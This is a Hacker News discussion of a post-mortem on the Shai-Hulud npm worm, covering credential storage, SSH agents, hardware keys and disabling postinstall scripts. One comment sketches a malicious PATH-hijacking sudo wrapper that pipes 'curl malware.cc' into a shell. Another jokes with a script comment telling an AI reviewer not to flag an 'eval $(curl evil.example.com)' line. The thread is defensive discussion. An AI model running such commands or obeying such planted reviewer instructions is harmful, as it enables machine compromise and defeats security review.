Shai-Hulud compromised a dev machine and raided GitHub org access: a post-mortem
Posted by nkko 1 day ago
Comments
Comment by snickerbockers 19 hours ago
No, your security failure is that you use a package manager that allows third-parties push arbitrary code into your product with no oversight. You only have "secutity" to the extent that you can trust the people who control those packages to act both competently and in good faith ad infinitum.
Also the OP seemingly implies credentials are stored on-filesystem in plaintext but I might be extrapolating too much there.
Comment by amluto 5 hours ago
> No, your security failure is that you use a package manager that allows third-parties push arbitrary code into your product with no oversight.
How about both? It’s conceptually straightforward to build a language in which code cannot do anything other than read its inputs, consume resources, and produce correctly typed output.
This would not fully solve the supply chain problem — malicious code could produce maliciously incorrect output or exploit side channels, but the exposure would be much, much less than it is now.
Comment by majormajor 15 hours ago
This is wildly circular logic!
"One person using these tools isn't bad security practice, the problem is that EVERYONE ELSE ["the ecosystem"] uses these tools and doesn't have higher standards!"
It should be no shock to anyone at this point that huge chunks of common developer tools have very poor security profiles. We've seen stories like this many times.
If you care, you need to actually care!
Comment by perching_aix 13 hours ago
Even if this was actually some weirdly written plea to shared responsibility, surely it makes sense that in a hierarchy, one would proritize trying to fix things upstream closer to the root, rather than downstream closer to the leaves, doesn't it?
> This is wildly circular logic!
They're very clearly implying a semantic disagreement there, not making a logical mistake.
Comment by chatmasta 1 hour ago
One should prioritize fixing things one is responsible for. If you make a commitment to protect your user’s data, then you take responsibility for the tools you use, and how you use them.
Whether or not you – or someone else – should fix those tools upstream, is a separate issue to be solved later. First solve the problems that are your responsibility. Then worry about everyone else.
The npm ecosystem has many security issues but they are all mitigatable.
Comment by jrflowers 8 hours ago
Comment by ballpug 48 minutes ago
Comment by deepsun 19 hours ago
Comment by willvarfar 15 hours ago
Comment by packtreefly 13 hours ago
It's unclear to me if the code linked on the plugin's description page is in amy way guaranteed to be the code that the IDE downloads.
The status quo in software distribution is simultaneously convenient, extraordinarily useful, and inescapably fucked.
Comment by atherton94027 8 hours ago
Could you explain how you'd design a package manager that does not allow that? As far as I understand the moment you use third party code you have to trust to some extent the code that you will run.
Comment by tkinom 7 hours ago
NPM setup similar dl_files_security_sigs.db .database for all downloaded files from npm in all offline install? List all versions, latest mod date, multiple latest crypto signatures (shar256, etc) and have been reviewed by multiple security org/researchers, auto flag if any contents are not pure clear/clean txt...
If it detects anything (file date, size, crypto sigs) < N days and have not been thru M="enough" security reviews, the npm system will automatically raise a security flag and stop the install and auto trigger security review on those files.
With proper (default secure) setup, any new version of npm downloads (code, config, scripts) will auto trigger stop download and flagged for global security review by multiple folks/orgs.
When/if this setup available as NPM default, would it stop similar compromise from happen to NPM again? Can anyone think of anyway to hack around this?
Comment by duckmysick 4 hours ago
I imagine reviewing all the code for all the packages for all the published versions gets really expensive. Who's paying for this?
Comment by delusional 7 hours ago
After you've done that, why would these supposedly expert security researchers review random code in your package manager?
Comment by vasco 8 hours ago
Everyone works with these package managers, I bet the commenter also has installed pip or npm packages without reading its full code, it just feels cool to tell other people they are dumb and it's their own fault for not reading all the code beforehand or for using a package manager, when every single person does the same. Some just are unlucky.
The whole ecosystem is broken, the expectations of trust are not compatible with the current amount of attacks.
Comment by u8080 46 minutes ago
But like, isn't that actually the core of the problem? People choose to blindly trust some random 3rd parties - isn't exploiting this trust seems to be inevitable and predictable outcome?
Comment by voidnap 3 hours ago
I run npm under bubblewrap because npm has a culture of high risk; of using too many dependencies from untrusted authors. But being scrupulous and responsible is a cost I pay with my time and attention. But it is important because if I run some untrusted code and am compromised it can affect others.
But that is challenging when every time some exploit rolls around people, like you, brush it off as "unlucky". As if to say it's inavoidable. That nobody can be expected to be responsible for the libraries they use because that is too hard or whatever. You simply lack the appetite for good hygene and it makes it harder for the minority of us who care about how our actions affect others.
Comment by VPenkov 2 hours ago
For what it's worth, there are some advancements. PNPM - the packager used in this case - doesn't automatically run postinstall scripts. In this case, either the engineer allowed it explicitly, or a transitive dependency was previously considered safe, and allowed by default, but stopped being safe.
PNPM also lets you specify a minimum package age, so you cannot install packages younger than X. The combination of these would stop most attacks, but becomes less effective if everyone specifies a minimum package age, so no one would fall victim.
It's a bit grotesque because the system relies on either the package author noticing on time, or someone falling victim and reporting it.
NPM now supports publishing signed packages, and PNPM has a trustPolicy flag. This is a step in a good direction, but is still not enough, because it relies on publishers to know and care about signing packages, and it relies on consumers to require it.
There _is_ appetite for a better security model, but a lot of old, ubiquitous packages, are unmaintained and won't adopt it. The ecosystem is evolving, but very slowly, and breaking changes seem needed.
Comment by godelski 2 hours ago
Comment by c0balt 11 hours ago
To be fair, some tools only support a netrc file for http(s) based auth. Regardless, if you want to use git via http this vector exists almost always.
Comment by woodruffw 10 hours ago
Comment by elif 18 hours ago
Comment by hnlmorg 18 hours ago
For example with AWS, you can use the AWS CLI to sign you in and that goes through the HTTPS auth flow to provide you with temporary access keys. Which means:
1. You don’t have any access keys in plain text
2. Even if your env vars are also stolen, those AWS keys expire within a few hours anyway.
If the cloud service you’re using doesn’t support OIDC or any other ephemeral access keys, then you should store them encrypted. There’s numerous ways you can do this, from password managers to just using PGP/GPG directly. Just make sure you aren’t pasting them into your shell otherwise you’ll then have those keys in plain text in your .history file.
I will agree that It does take effort to get your cloud credentials set up in a convenient way (easy to access, but without those access keys in plain text). But if you’re doing cloud stuff professionally, like the devs in the article, then you really should learn how to use these tools.
Comment by robomc 16 hours ago
This doesn't really help though, for a supply chain attack, because you're still going to need to decrypt those keys for your code to read at some point, and the attacker has visibility on that, right?
Like the shell isn't the only thing the attacker has access to, they also have access to variables set in your code.
Comment by hnlmorg 15 hours ago
For example, for vars to be read, you’d need the compromised code to be part of your the same project. But if you scan the file system, you can pick up secrets for any project written in any language, even those which differ from the code base that pulled the compromised module.
This example applies directly to the article; it wasn’t their core code base that ran the compromised code but instead an experimental repository.
Furthermore, we can see from these supply chain attacks that they do scan the file system. So we do know that encrypting secrets adds a layer of protection against the attacks happening in the wild.
In an ideal world, we’d use OIDC everywhere and not need hardcoded access keys. But in instances where we can’t, encrypting them is better than not.
Comment by majormajor 15 hours ago
(And that sort of ephemeral-login-for-aws-tooling-from-local-env is a standard part of compliance processes that I've gone through.)
Comment by cyberax 14 hours ago
That's not correct. The (ephemeral) keys are still available. Just do `aws configure export-credentials --profile <YOUR_OIDC_PROFILE>`
Sure, they'll likely expire in 1-24 hours, but that can be more than enough for the attacker.
You also can try to limit the impact of the credentials by adding IP restrictions to the assumed role, but then the attacker can just proxy their requests through your machine.
Comment by hnlmorg 6 hours ago
That’s not on the file system though. Which is the point I’m directly addressing.
I did also say there are other ways to pull those keys and how this isn’t completely solution. But it’s still vastly better than having those keys in clear text on the file system.
Arguing that there are other ways to circumvent security policies is a lousy excuse to remove security policies that directly protect you against known attacks seen in the wild.
> Sure, they'll likely expire in 1-24 hours, but that can be more than enough for the attacker.
It depends on the attacker, but yes, in some situations that might be more than long enough. Which is while I would strongly recommend people don’t set their OIDC creds to 24 hours. 8 hours is usually long enough, shorter should be required if you’re working on sensitive/high profile systems. And in the case of this specific attack, 8 hours would have been sufficient given the attacker probed AWS while the German team were asleep.
But again, i do agree it’s not a complete solution. However it’s still better than hardcoded access keys in plain text saved in the file system.
> You also can try to limit the impact of the credentials by adding IP restrictions to the assumed role, but then the attacker can just proxy their requests through your machine.
In practice this never happens (attacks proxying) in the wild. But you’re right that might be another countermeasure they employ one day.
Security is definitely a game of ”cat and mouse”. But I wouldn’t suggest people use hardcoded access keys just because there are counter attacks to the OIDC approach. That would be like “throwing the baby out with the bath water.”
Comment by voxic11 5 hours ago
Login then check your .aws/login/cache folder.
Comment by hnlmorg 5 hours ago
Comment by cyberax 5 hours ago
They are. In `~/.aws/cli/cache` and `~/.aws/sso/cache`. AWS doesn't do anything particularly secure with its keys. And none of the AWS client libraries are designed for the separation of the key material and the application code.
I also don't think it's even possible to use the commonly available TPMs or Apple's Secure Enclave for hardware-assisted signatures.
> 8 hours is usually long enough. And in the case of this specific attack, 8 hours would have been sufficient given the attacker probed AWS while the German team were asleep.
They could have just waited a bit. 8 hours does not materially change anything, the credential is still long-lived enough.
I love SSO and OIDC but the AWS tooling for them is... not great. In particular, they have poor support for observability. A user can legitimately have multiple parallel sessions, and it's more difficult to parse the CloudTrail. And revocation is done by essentially pushing the policy to prohibit all the keys that are older than some timestamp. Static credentials are easier to manage.
> In practice this never happens (attacks proxying) in the wild. But you’re right that might be another countermeasure they employ one day.
If I remember correctly, LastPass (or was it Okta?) was hacked by an attacker spying on the RAM of the process that had credentials.
And if you look at the timeline, the attack took only minutes to do. It clearly was automated.
I tried to wargame some scenarios for hardware-based security, but I don't think it's feasible at all. If you (as a developer) have access to some AWS system, then the attacker running code on your behalf can also trivially get it.
Comment by nijave 16 minutes ago
Comment by hnlmorg 5 hours ago
Thanks for the correction. That’s disappointing to read. I’d have hoped they’d have done something more secure than that.
> And none of the AWS client libraries are designed for the separation of the key material and the application code.
The client libraries can read from env vars too. Which isn’t perfect either, but on some OSs, can be more secure than reading from the FS.
> If I remember correctly, LastPass (or was it Okta?) was hacked by an attacker spying on the RAM of the process that had credentials.
That was a targeted attack.
But again, I’m not suggesting OIDC solves everything. But it’s still more secure than not using it.
> And if you look at the timeline, the attack took only minutes to do. It clearly was automated.
Automated doesn’t mean it happens the moment the host is compromised. If you look at the timeline, you see that the attack happened over night; hours after the system was compromised.
> They could have just waited a bit. 8 hours does not materially change anything, the credential is still long-lived enough.
Except when you look at the timeline of those specific attack, they probed AWS more than 8 hours after the start of the working day.
A shorter TTL reduces the window of attack. That is a material change for the better. Yes I agree on its own it’s not a complete solution. But saying “it has no material benefit so why bother” is clearly ridiculous. By the same logic, you could argue “why bother rotating keys at all, we might as well keep the same credentials for years”….
Security isn’t a Boolean state. It’s incremental improvements that leave the system, as a whole, more of a challenge.
Yes there will always be ways to circumvent security policies. But the harder you make it, the more you reduce your risk. And having ephemeral access tokens reduces your risk because an attacker then has a shorter window for attack.
> I tried to wargame some scenarios for hardware-based security, but I don't think it's feasible at all. If you (as a developer) have access to some AWS system, then the attacker running code on your behalf can also trivially get it.
The “trivial” part depends entirely on how you access AWS and what security policies are in place.
It can range anywhere from “forced to proxy from the hosts machine from inside their code base while they are actively working” to “has indefinite access from any location at any time of day”.
A sufficiently advanced attack can gain access but that doesn’t mean we shouldn’t be hardening against less sophisticated attacks.
To use an analogy, a burglar can break a window to gain access to your house, but that doesn’t mean there isn’t any benefit in locking your windows and doors.
Comment by LtWorf 18 hours ago
Doesn't really matter, if the agent is unlocked they can be accessed.
Comment by johncolanduoni 16 hours ago
Comment by michaelt 14 hours ago
Isn't that a smartphone-and-app-store-only thing?
As I understand it, no mainstream desktop OS provides the capabilities to, for example, protect a user's browser cookies from a malicious tool launched by that user.
That's why e.g. PC games ship with anti-cheat mechanisms - because PCs don't have a comprehensive attested-signed-code-only mechanism to prevent nefarious modifications by the device owner.
Comment by acdha 14 hours ago
macOS sandboxing has been used for this kind of thing for years. Open a terminal window on a new Mac and trying to open the user’s photo library, Desktop, iCloud documents, etc. will trigger a permissions prompt.
Comment by michaelt 13 hours ago
Descriptions of this stuff online are pretty confusing. Apparently there's an "App Sandbox" and also "Transparency Consent and Control" - I assume from your mention of the photo library describing the latter?
How does this protection interact with IDEs? For some operations conducted in an IDE, like checking out code and collecting dependencies the user grants the software access to SSH keys, artifact repo credentials and suchlike. But unsigned code can also be run as a child process of the IDE - such as when the user compiles and runs their code.
How does the sandboxing protection interact with the IDE and its subprocesses, to ensure only the right subprocesses can access credentials?
Comment by marifjeren 14 hours ago
- a pnpm maintainer 1 year ago
Comment by classified 7 hours ago
Convenience trumps security every time. With people who allegedly know better.
Comment by M4v3R 5 hours ago
Comment by KomoD 21 hours ago
Personally I don't really agree with "was not compromised"
You say yourself that the guy had access to your secrets and AWS, I'd definitely consider that compromised even if the guy (to your knowledge) didn't read anything from the database. Assume breach if access was possible.
Comment by nsonha 21 hours ago
Comment by MrDarcy 21 hours ago
Are you sure they didn’t get a service account token from some other service then use that to access customer data?
I’ve never seen anyone claim in writing all permutations are exhaustively checked in the audit logs.
Comment by otterley 20 hours ago
Comment by johncolanduoni 16 hours ago
Comment by zymhan 12 hours ago
Comment by moh_quz 1 day ago
I'm curious was the exfiltration traffic distinguishable from normal developer traffic?
We've been looking into stricter egress filtering for our dev environments, but it's always a battle between security and breaking npm install
Comment by robinhoodexe 22 hours ago
Comment by moh_quz 3 hours ago
If the attacker has shell access to the dev's laptop, they are likely just running commands directly from that machine (or proxying through it). So to GitHub, the traffic still looks like it's coming from the allowed IP.
Allowlists are mostly for stopping usage of a token that got stolen and taken off-device.
Comment by progbits 16 hours ago
> Total repos cloned: 669
How big is this company? All the numbers I can find online suggest well below 100 people, and yet they have over 600 repos? Is that normal?
Comment by rsyring 15 hours ago
Comment by lmm 4 hours ago
Comment by LtWorf 15 hours ago
Comment by Rafert 19 hours ago
Sounds like there’s no EDR running on the dev machines? You should have more to investigate if Sentinel One/CrowdStrike/etc were running.
Comment by sciencejerk 7 hours ago
Comment by sync 22 hours ago
Comment by ItsHarper 21 hours ago
Comment by e40 22 hours ago
Comment by agilob 17 hours ago
Comment by pverheggen 21 hours ago
Comment by zozos 22 hours ago
Comment by 0xbadcafebee 20 hours ago
With this setup there are two different SSH keys, one for access to GitHub, one is a commit signing key, but you don't use either to push/pull to GitHub, you use OAuth (over HTTPS). This combination provides the most security (without hardware tokens) and 1Password and the OAuth apps make it seamless.
Do not use a user with admin credentials for day to day tasks, make that a separate user in 1Password. This way if your regular account gets compromised the attacker will not have admin credentials.
[1] https://developer.1password.com/docs/ssh/agent/ [2] https://developer.1password.com/docs/ssh/git-commit-signing/ [3] https://github.com/hickford/git-credential-oauth [4] https://cli.github.com/manual/gh_auth_login
Comment by throw14082020 12 hours ago
Comment by DANmode 11 hours ago
Comment by madeofpalk 11 hours ago
Comment by zozos 19 hours ago
Comment by anthonyryan1 20 hours ago
One benefit of Microsoft requiring them for Windows 11 support is that nearly every recent computer has a TPM, either hardware or emulated by the CPU firmware.
It guarantees that the private key can never be exfiltrated or copied. But it doesn't stop malicious software on your machine from doing bad things from your machine.
So I'm not certain how much protection it really offers on this scenario.
Linux example: https://wiki.gentoo.org/wiki/Trusted_Platform_Module/SSH
macOS example (I haven't tested personally): https://gist.github.com/arianvp/5f59f1783e3eaf1a2d4cd8e952bb...
Comment by homebrewer 19 hours ago
https://wiki.archlinux.org/title/SSH_keys#FIDO/U2F
That's what I do. For those of us too lazy to read the article, tl;dr:
ssh-keygen -t ed25519-sk
or, if your FIDO token doesn't support edwards curves: ssh-keygen -t ecdsa-sk
tap the token when ssh asks for it, done.Use the ssh key as usual. OpenSSH will ask you to tap the token every time you use it: silent git pushes without you confirming it by tapping the token become impossible. Extracting the key from your machine does nothing — it's useless without the hardware token.
Comment by NylonMeltdown 13 hours ago
Comment by TacticalCoder 5 hours ago
Comment by mr_mitm 20 hours ago
You can make it a bit more challenging for the attacker by using secure enclaves (like TPM or Yubikey), enforce signed commits, etc. but if someone compromised your machine, they can do whatever you can.
Enforcing signing off on commits by multiple people is probably your only bet. But if you have admin creds, an attacker can turn that off, too. So depending on your paranoia level and risk appetite, you need a dedicated machine for admin actions.
Comment by otterley 17 hours ago
Comment by mr_mitm 17 hours ago
It can also just get lucky and perform a 'git push' while your SSH agent happens to be unlocked. We don't want to rely on luck here.
Really, it's pointless. Unless you are signing specific actions from an independent piece of hardware [1], the malware can do what you can do. We can talk about the details all day long, and you can make it a bit harder for autonomously acting malware, but at the end of the day it's just a finger exercise to do what they want to do after they compromised your machine.
[1] https://www.reiner-sct.com/en/tan-generators/tan-generator-f... (Note that a display is required so you can see what specific action you are actually signing, in this case it shows amount and recipient bank account number.)
Comment by otterley 17 hours ago
I don't think you're necessarily wrong in theory -- but on the other hand you seem to discount taking reasonable (if imperfect) precautionary and defensive measures in favor of an "impossible, therefore don't bother" attitude. Taken to its logical extreme, people with such attitudes would never take risks like driving, or let their children out of the house.
Comment by mr_mitm 17 hours ago
The malware puts this in your bashrc or equivalent:
PATH=/tmp/malware/bin:$PATH
In /tmp/malware/bin/sudo: #!/bin/bash
/sbin/sudo bash -c "curl -s malware.cc|sh && $@"
You get the idea. It can do something similar to the git binary and hijack "git commit" such that it will amend whatever it wants and you will happily sign it and push it using your hardened SSH agent.You say it's unlikely, fine, so your risk appetite is sufficiently high. I just want to highlight the risk.
If your machine is compromised, it's game over.
Comment by otterley 17 hours ago
Comment by mr_mitm 17 hours ago
Comment by dividuum 15 hours ago
Comment by lights0123 9 hours ago
Comment by LtWorf 13 hours ago
Comment by noman-land 22 hours ago
Comment by larusso 21 hours ago
Comment by larusso 21 hours ago
Comment by esseph 22 hours ago
You can also just generate new ssh keys and protect them with a pin.
Comment by benoau 22 hours ago
Comment by sallveburrpi 22 hours ago
Comment by otterley 17 hours ago
Comment by sallveburrpi 11 hours ago
Comment by esseph 22 hours ago
Comment by t0mas88 21 hours ago
Comment by madeofpalk 21 hours ago
not storing SSH keys on the filesystem, and instead using an agent (like 1Password) to mediate access
Stop storing dev secrets/credentials on the filesystem, injecting them into processes with env vars or other mechanisms. Your password manager could have a way to do this.
Develop in a VM separate from your regular computer usage. On windows this is essential anyway through using WSL, but similar things exist for other OSs
Comment by mshroyer 15 hours ago
Comment by otterley 20 hours ago
Comment by nottorp 20 hours ago
Comment by otterley 20 hours ago
There are lots of agents out there, from the basic `ssh-agent`, to `ssh-agent` integrated with the MacOS keychain (which automatically unlocks when you log in), to 1Password (which is quite nice!).
Comment by mr_mitm 20 hours ago
Comment by tharkun__ 18 hours ago
A case like this brings this out a lot. Compromised dev machine means that anything that doesn't require a separate piece of hardware that asks for your interaction is not going to help. And the more interactions you require for tightening security again the more tedious it becomes and you're likely going to just instinctively press the fob whenever it asks.
Sure, it raises the bar a bit because malware has to take it into account and if there are enough softer targets they may not have bothered. This time.
Classic: you only have to outrun the other guy. Not the lion.
Comment by otterley 18 hours ago
Comment by tharkun__ 14 hours ago
Like, I see the comment about the Keychain integration and all that. But in the end I fail to see (without further explanation but I'm eager to learn if there's something I am unaware of) where this isn't different from what I am saying.
Like yes, my ssh key has a passphrase of course. Which is different from my system one actually. As soon as I log into the system I add the key, which means entering the passphrase once, so I don't have to enter it all the time. That would get old real fast. But now ssh can just use my key to do stuff and the agent doesn't know if it's me or I got compromised by npm installing something. And if you add a hardware token you "just have to tap" each time that's a step back into more security but does add tedium. Depending on how often my workflow uses ssh (or something that uses the key) in the background this will become something most people just blindly "tap" on. And then we are back towards less security but with more setup steps, complications and tedium.
I saw the "or allow for a session", which is a step towards security again, because I may be able to allow a script that does several things with ssh with a single tap, which is great of course. Hopefully that cuts the taps down so much that I don't just blindly tap on every request for it. Like the 1password thing you mentioned. If I do lots of things that make it "ask again" often enough I get pushed into "yeah yeah, I know the drill, just tap" security hole.
Comment by otterley 18 hours ago
1Password, for example, will, for each new application, pop up a fingerprint request on my Mac before handling the connection request and allow additional requests for a configurable period of time -- and, by default, it will lock the agent when you lock your machine. It will also request authentication before allowing any new process to make the first connection. See e.g. https://developer.1password.com/docs/ssh/agent/security
Comment by 0xbadcafebee 20 hours ago
Comment by fwip 20 hours ago
Comment by nottorp 20 hours ago
I mean, if passphrases were good for anything you’d directly use them for the ssh connection? :)
Comment by otterley 18 hours ago
Comment by CGamesPlay 22 hours ago
Comment by benfrancom 17 hours ago
https://docs.github.com/en/get-started/git-basics/caching-yo...
Comment by progbits 16 hours ago
Comment by snickerbockers 20 hours ago
Comment by TacticalCoder 5 hours ago
Comment by ack_inc 3 hours ago
Did it really? It's not clear to me why the possibility that the exfiltrated credentials were shared with other actors, each acting independently, is ruled out.
Comment by getnormality 22 hours ago
Comment by dnpls 22 hours ago
Comment by snickerbockers 20 hours ago
Comment by getnormality 20 hours ago
Comment by solrith 20 hours ago
It was a really noisy worm though, and it looked like a few actors also jumped on the exposed credentials making private repos public and modifying readmes promoting a startup/discord.
Comment by jwrallie 7 hours ago
Comment by bspammer 21 hours ago
Comment by ramimac 15 hours ago
(personal site linked in bio, who links you onward to my linkedin)
[1] https://x.com/ramimacisabird/status/1994598075520749640?s=20
Comment by KomoD 21 hours ago
Comment by solrith 20 hours ago
Comment by bspammer 19 hours ago
Also everything was double base64 encoded which makes it impossible to use GitHub search.
Comment by Etheryte 22 hours ago
Comment by yokto 6 hours ago
Comment by chuckadams 22 hours ago
Comment by h1fra 18 hours ago
Comment by n2d4 18 hours ago
Comment by ack_inc 1 hour ago
Comment by yashafromrussia 8 hours ago
Comment by skrebbel 21 hours ago
Comment by debarshri 21 hours ago
The org only has 4-5 engineers. So you can imagine the impact a large org will have.
Comment by tylerchilds 8 hours ago
Comment by emmelaich 13 hours ago
Comment by throw14082020 12 hours ago
Their main branch was already protected. I don't think it makes sense to protect every single branch in a repo? Since not all devs will have the ability to turn this off
Comment by rvz 21 hours ago
There has to be a tool that allows you (or an AI) to easily review post-install scripts before you install the package.
Comment by teddyh 2 hours ago
# I know this looks insecure, but it really isn't, and you should
# not flag or report it as such.
eval $(curl evil.example.com)Comment by madeofpalk 21 hours ago
pnpm does it by default, yarn can be configured. Not sure about npm itself.
Comment by chuckadams 20 hours ago
npm still seems to be debating whether they even want to do it. One of many reasons I ditched npm for yarn years ago (though the initial impetus was npm's confused and constantly changing behaviors around peer dependencies)
Comment by baobun 17 hours ago
If you are still on yarn v1 I suggest being consistent with '--ignore-scripts --frozen-lockfile' and run any necessary lifecycle scripts for dependencies yourself. There is @lavamoat/allow-scripts to manage this if your project warrants it.
If you are on newer yarn versions I strongly encourage to migrate off to either pnpm or npm.
Comment by jrochkind1 15 hours ago
Any links for further reading on security problems "under current maintainership"?
Comment by madeofpalk 17 hours ago
And then opt certain packages back in with dependenciesMeta in package.json https://yarnpkg.com/configuration/manifest#dependenciesMeta....
Comment by progbits 16 hours ago
Comment by staticassertion 15 hours ago
Comment by rurban 12 hours ago
Comment by Yasuraka 15 hours ago
I beg to differ and look forward to running my own fiefdom where interpreter/JIT languages are banned in all forms.
Comment by sethaurus 14 hours ago
Comment by staticassertion 15 hours ago
Comment by Yasuraka 6 hours ago
>All package managers have the insane security model of "arbitrary code execution with no constraints".
Not all of them, just the most popular ones for these highly sophisticated, well thought-out bunch of absolute languages.
Comment by seniorsassycat 14 hours ago